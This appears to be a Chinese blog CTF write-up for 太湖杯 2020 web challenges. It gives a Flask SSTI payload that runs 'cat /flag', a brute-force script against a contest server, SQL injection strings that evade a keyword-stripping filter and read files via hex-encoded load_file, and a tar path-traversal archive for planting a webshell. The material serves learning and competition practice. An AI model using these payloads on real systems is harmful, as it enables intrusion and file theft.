太湖杯 2020
|
264
|
0
|
比赛

267 字
|
2 分钟

跟在Decade后面复现的,大佬稳

checkInGame

注释updateTime

easyWeb

字符规范器,还挺好玩的,过滤掉了Flask SSTI常见的字符,用Unicode字符绕过

{
}
[
]
'
"
{{url_for.__globals__['__builtins__']['eval']('__import__("os").popen("cat /flag").read()')}}

抄点payload:

https://10-0-0-55.github.io/web/flask/ssti/

这个payload不能使,有点蛋疼,看来有时候要多试几个。

{{''.class.mro()[1].subclasses()}}

ezMd5

存在auth.so文件

Php::Parameters *__fastcall auth(Php::Parameters *a1, __int64 a2)
{
  __int64 v2; // rax
  __int64 v3; // rax
  char v5; // [rsp+10h] [rbp-60h]
  char v6[8]; // [rsp+30h] [rbp-40h]
  unsigned __int64 v7; // [rsp+58h] [rbp-18h]

  v7 = __readfsqword(0x28u);
  strcpy(v6, "21232f297a57a5a743894a0e4a801fc3");
  v2 = std::vector<Php::Value,std::allocator<Php::Value>>::operator[](a2, 1LL);
  v3 = Php::Value::operator char const*(v2);
  strcpy(&v5, v3);
  Php::Value::Value(a1, v6, -1);
  return a1;
}

大概考点是栈溢出,MD5还真的挺好绕过的

看不懂,直接爆破

import requests

url = "http://122.112.253.121:10032/"

for i in range(50):
    password = 'a' * i + 'QNKCDZO'
    payload = {'name': 's878926199a', 'password': password}
    files = []
    headers = {
        'X-Forwarded-For': ''
    }

    response = requests.request("POST", url, headers=headers, data=payload, files=files)
    if response.text.find('flag{') != -1:
        print(payload)
        print(response.text.encode('utf8'))

CrossFire

先试了试蚁剑发现连不上,想想也不会这么简单

这里的id存在SQL注入,黑盒存在关键字转空字符串WAF,以及字符串过滤,使用十六进制读取文件:

-1' ununionion selselectect load_file(0x2f7661722f7777772f68746d6c2f696e6465782e706870)%23

index.php:

<?php
    error_reporting(0);
    session_start();
    include('config.php');

    $upload = 'upload/'.md5("shuyu".$_SERVER['REMOTE_ADDR']);
    @mkdir($upload);
    file_put_contents($upload.'/index.html', '');
    
    if(isset($_POST['submit'])){
        $allow_type=array("jpg","gif","png","bmp","tar","zip");
        $fileext = substr(strrchr($_FILES['file']['name'], '.'), 1);
        if ($_FILES["file"]["error"] > 0 && !in_array($fileext,$type) && $_FILES["file"]["size"] > 204800){
            die('upload error');
        }else{
        
            $filename=addslashes($_FILES['file']['name']);
            $sql="insert into img (filename) values ('$filename')";
            $conn->query($sql);

            $sql="select id from img where filename='$filename'";
            $result=$conn->query($sql);

            if ($result->num_rows > 0) {
                while($row = $result->fetch_assoc()) {
                    $id=$row["id"];
                }

            move_uploaded_file($_FILES["file"]["tmp_name"],$upload.'/'.$filename);
            header("Location: index.php?id=$id");
            }
        }
    }

    elseif (isset($_GET['id'])){
        $id=addslashes($_GET['id']);
        $sql="select filename from img where id=$id";
        $result=$conn->query($sql);
        if ($result->num_rows > 0) {
            while($row = $result->fetch_assoc()) {
                $filename=$row["filename"];
            }
        $img=$upload.'/'.$filename;
        echo "<img src='$img'/>";
        }
    }

    elseif (isset($_POST['submit1'])){
        $allow_type=array("jpg","gif","png","bmp","tar","zip");
        $fileext = substr(strrchr($_FILES['file']['name'], '.'), 1);
        if ($_FILES["file"]["error"] > 0 && !in_array($fileext,$type) && $_FILES["file"]["size"] > 204800){
            die('upload error');
        }else{
            $filename=addslashes($_FILES['file']['name']);
            move_uploaded_file($_FILES["file"]["tmp_name"],$upload.'/'.$filename);
            @exec("cd /tmp&&python3 /tar.py ".escapeshellarg('/var/www/html/'.$upload.'/'.$filename));
            }
        }
?>

存在tar.py文件,读取改文件:

-1' ununionion selselectect load_file(0x2f7461722e7079)%23

源码

import sys
tar = tarfile.open(sys.argv[1], "r")
tar.extractall()

写的是有关tar文件解压过程

tar cvf exp22.tar ../../../var/www/html/upload/shell.php -P

压缩一个文件

最后上传,然后解压,最后在upload/shell.php里面getshell,执行readflag

CTFWEB
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
						

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇